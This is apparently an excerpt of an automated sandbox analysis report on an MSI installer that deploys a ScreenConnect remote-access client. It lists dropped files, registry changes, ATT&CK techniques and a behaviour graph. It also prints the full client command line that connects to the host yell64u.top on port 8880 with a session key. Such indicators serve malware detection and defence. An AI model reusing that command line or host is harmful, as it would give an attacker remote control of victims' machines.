                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMemory allocated: 1530000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMemory allocated: 1770000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMemory allocated: 1590000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: B40000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: 1A4D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: 13E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMemory allocated: 1ADE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.Core.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI160A.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.Windows.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3F.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI17FF.tmpJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                        Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dllJump to dropped file
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe TID: 2496Thread sleep count: 52 > 30Jump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe TID: 6412Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeLast function: Thread delayed
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeLast function: Thread delayed
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: 5c1177.msi.1.drBinary or memory string: VMCi-
                        Source: ScreenConnect.ClientService.exe, 00000006.00000002.2904291962.0000000000C4A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll`
                        Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: ScreenConnect.ClientService.dll.1.dr, ClientService.csReference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
                        Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                        Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                        Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                        Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                        Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.clientservice.exe" "?e=access&y=guest&h=yell64u.top&p=8880&s=c74b013c-c400-4ba6-a343-b7faf5e5e46a&k=bgiaaackaabsu0exaagaaaeaaqdfk%2fbbpi2y%2fu64inmnualvsinhikj3qixef2eblhktkmb9wafgho8pwjl0lvyg9kgvgb%2fbbr7p8upybqqwjmt2zg9vyagxlcjy%2fd8w0%2b7tfbgg8gffcjoob3tupnzbetnvs8%2bybotmzzsmg6ijynblxj1gtcahumwr1u8jkfxsyvpzrxohbr31dmibtzi1nunryf8xa6qxsktbm1h0aqgbzr6fzuzymqekrjktwq2%2fxup3dlz4en6bz1k0onlkviz5vhj3h597ijpgkjlbhftfc4t%2btt%2bncv6zqw83iwwtzxibtxf7nmuvq0n4ff2lkmh5flu07mqw%2fy38%2b5mo41xa&c=dxbleave&c=&c=&c=&c=&c=&c=&c="
                        Source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                        Source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFD9B403642 CreateNamedPipeW,7_2_00007FFD9B403642
                        Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 6_2_01534D30 RtlGetVersion,6_2_01534D30
                        Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Lowering of HIPS / PFW / Operating System Security Settings

                        barindex
                        Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                        Source: Yara matchFile source: 7.2.ScreenConnect.WindowsClient.exe.254fa20.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 7.0.ScreenConnect.WindowsClient.exe.280000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.ScreenConnect.WindowsClient.exe.2e5fa60.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000007.00000000.1702671144.0000000000282000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000007.00000002.2905272548.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.1743451963.0000000002DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4820, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4888, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 3868, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Config.Msi\5c1176.rbs, type: DROPPED
                        Source: Yara matchFile source: C:\Windows\Installer\MSI15E9.tmp, type: DROPPED
                        Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, type: DROPPED
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire Infrastructure1
                        Valid Accounts
                        31
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        11
                        Disable or Modify Tools
                        OS Credential Dumping11
                        Peripheral Device Discovery
                        Remote Services1
                        Archive Collected Data
                        2
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomains1
                        Replication Through Removable Media
                        1
                        Native API
                        1
                        Component Object Model Hijacking
                        1
                        Component Object Model Hijacking
                        1
                        Obfuscated Files or Information
                        LSASS Memory45
                        System Information Discovery
                        Remote Desktop ProtocolData from Removable Media1
                        Non-Standard Port
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Command and Scripting Interpreter
                        1
                        Valid Accounts
                        1
                        Valid Accounts
                        1
                        Timestomp
                        Security Account Manager21
                        Security Software Discovery
                        SMB/Windows Admin SharesData from Network Shared Drive1
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Scheduled Task/Job
                        2
                        Windows Service
                        1
                        Access Token Manipulation
                        1
                        DLL Side-Loading
                        NTDS2
                        Process Discovery
                        Distributed Component Object ModelInput Capture1
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchd1
                        Scheduled Task/Job
                        2
                        Windows Service
                        1
                        File Deletion
                        LSA Secrets51
                        Virtualization/Sandbox Evasion
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                        Bootkit
                        3
                        Process Injection
                        122
                        Masquerading
                        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                        Scheduled Task/Job
                        1
                        Valid Accounts
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Access Token Manipulation
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt51
                        Virtualization/Sandbox Evasion
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron3
                        Process Injection
                        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                        Hidden Users
                        Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                        Bootkit
                        KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                        Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                        Rundll32
                        GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555428 Sample: setup.msi Startdate: 13/11/2024 Architecture: WINDOWS Score: 80 50 yell64u.top 2->50 54 .NET source code references suspicious native API functions 2->54 56 Contains functionality to hide user accounts 2->56 58 Possible COM Object hijacking 2->58 60 2 other signatures 2->60 8 msiexec.exe 94 51 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 msiexec.exe 6 2->15         started        signatures3 process4 dnsIp5 32 ScreenConnect.Wind...dentialProvider.dll, PE32+ 8->32 dropped 34 C:\...\ScreenConnect.WindowsClient.exe, PE32 8->34 dropped 36 C:\...\ScreenConnect.ClientService.exe, PE32 8->36 dropped 40 10 other files (1 malicious) 8->40 dropped 66 Enables network access during safeboot for specific services 8->66 68 Modifies security policies related information 8->68 17 msiexec.exe 8->17         started        19 msiexec.exe 1 8->19         started        21 msiexec.exe 8->21         started        52 yell64u.top 85.239.34.190, 49730, 8880 RAINBOW-HKRainbownetworklimitedHK Russian Federation 12->52 70 Reads the Security eventlog 12->70 72 Reads the System eventlog 12->72 23 ScreenConnect.WindowsClient.exe 3 12->23         started        26 ScreenConnect.WindowsClient.exe 2 12->26         started        38 C:\Users\user\AppData\Local\Temp\MSID3F.tmp, PE32 15->38 dropped file6 signatures7 process8 signatures9 28 rundll32.exe 11 17->28         started        62 Creates files in the system32 config directory 23->62 64 Contains functionality to hide user accounts 23->64 process10 file11 42 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 28->42 dropped 44 C:\...\ScreenConnect.InstallerActions.dll, PE32 28->44 dropped 46 C:\Users\user\...\ScreenConnect.Core.dll, PE32 28->46 dropped 48 4 other files (none is malicious) 28->48 dropped 74 Contains functionality to hide user accounts 28->74 signatures12

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll0%ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll0%ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe0%ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll0%ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll0%ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                        C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSID3F.tmp0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.Core.dll0%ReversingLabs
